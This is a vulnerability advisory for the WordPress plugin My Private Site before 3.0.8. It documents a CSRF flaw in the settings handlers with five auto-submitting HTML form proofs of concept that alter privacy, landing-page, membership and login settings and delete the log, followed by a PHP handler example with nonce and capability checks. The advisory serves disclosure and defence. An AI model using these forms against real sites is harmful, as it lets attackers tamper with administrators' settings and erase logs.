WordPress Plugin Vulnerabilities
My Private Site < 3.0.8 - Arbitrary Settings Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="my_private_site_tab_site_privacy">
  <input type="text" name="jr_ps_admin_advanced_compatibility_mode" value="STANDARD">
  <input type="text" name="jr_ps_button_site_privacy_save" value="Save Privacy Status">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="my_private_site_tab_landing_page">
  <input type="text" name="jr_ps_admin_landing_page_option" value="url">
  <input type="text" name="jr_ps_admin_landing_page_url" value="https://example.com/whatever">
  <input type="text" name="jr_ps_button_landing_page_save" value="Save Landing Page">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="my_private_site_tab_membership">
  <input type="text" name="jr_ps_admin_membership_register" value="on">
  <input type="text" name="jr_ps_admin_membership_reveal" value="on">
  <input type="text" name="jr_ps_button_membership_save" value="Update Options">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="my_private_site_tab_advanced">
  <input type="text" name="jr_ps_admin_advanced_enable_custom_login" value="on">
  <input type="text" name="jr_ps_admin_advanced_url" value="https://example.com.google.com">
  <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
  <input type="text" name="jr_ps_button_advanced_save" value="Save Advanced Options">
  <input type="text" name="my_private_site_system_information" value="The log is empty.">
</form>
<script>
  document.getElementById("test").submit();
</script>

<form id="test" action="https://example.com/wp-admin/admin-post.php" method="POST">
  <input type="text" name="action" value="my_private_site_tab_advanced">
  <input type="text" name="jr_ps_admin_advanced_url" value="">
  <input type="text" name="jr_ps_admin_advanced_password_reset_url" value="">
  <input type="text" name="my_private_site_system_information" value="The log is empty.">
  <input type="text" name="jr_ps_button_settings_logs_delete" value="Delete Log">
</form>
<script>
  document.getElementById("test").submit();
</script>
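For comparison, this is how an admin-post.php settings handler looks with a capability check and a nonce check in front of the update. It is an added example, not the plugin's own code or its 3.0.8 patch: the action and field names come from the first form above, while the example_ function names, the nonce field name, the option key and the allow-list of values are assumptions.

```php
<?php
// Added example, not the plugin's code. Everything prefixed example_/EXAMPLE_
// is hypothetical; the action and jr_ps_* field names are taken from the PoC.

const EXAMPLE_ACTION      = 'my_private_site_tab_site_privacy';
const EXAMPLE_NONCE_FIELD = 'example_ps_nonce'; // hypothetical field name

// Settings form: embeds a nonce bound to the current user and this action.
// A page on another origin cannot read it, so it cannot forge a valid POST.
function example_render_site_privacy_form() {
    ?>
    <form action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>" method="POST">
        <input type="hidden" name="action" value="<?php echo esc_attr( EXAMPLE_ACTION ); ?>">
        <?php wp_nonce_field( EXAMPLE_ACTION, EXAMPLE_NONCE_FIELD ); ?>
        <select name="jr_ps_admin_advanced_compatibility_mode">
            <option value="STANDARD">STANDARD</option>
        </select>
        <input type="submit" name="jr_ps_button_site_privacy_save" value="Save Privacy Status">
    </form>
    <?php
}

// admin-post.php dispatches a POST with action=X to the admin_post_X hook.
add_action( 'admin_post_' . EXAMPLE_ACTION, 'example_save_site_privacy' );

function example_save_site_privacy() {
    // Authorization: only users who may manage settings get past this point.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF: stops the request unless the nonce is present and valid
    // for this action and this user.
    check_admin_referer( EXAMPLE_ACTION, EXAMPLE_NONCE_FIELD );

    $allowed = array( 'STANDARD' ); // assumption: only the value shown in the PoC
    $mode    = isset( $_POST['jr_ps_admin_advanced_compatibility_mode'] )
        ? sanitize_text_field( wp_unslash( $_POST['jr_ps_admin_advanced_compatibility_mode'] ) )
        : '';
    if ( ! in_array( $mode, $allowed, true ) ) {
        wp_die( 'Invalid value.', '', array( 'response' => 400 ) );
    }
    update_option( 'example_ps_compatibility_mode', $mode ); // hypothetical option key

    wp_safe_redirect( wp_get_referer() ?: admin_url() );
    exit;
}
```

Each of the five actions in the proof of concept needs the same two checks in its own handler, including the one that deletes the log.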
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-01
Added
2022-06-01
Last Updated
2023-03-01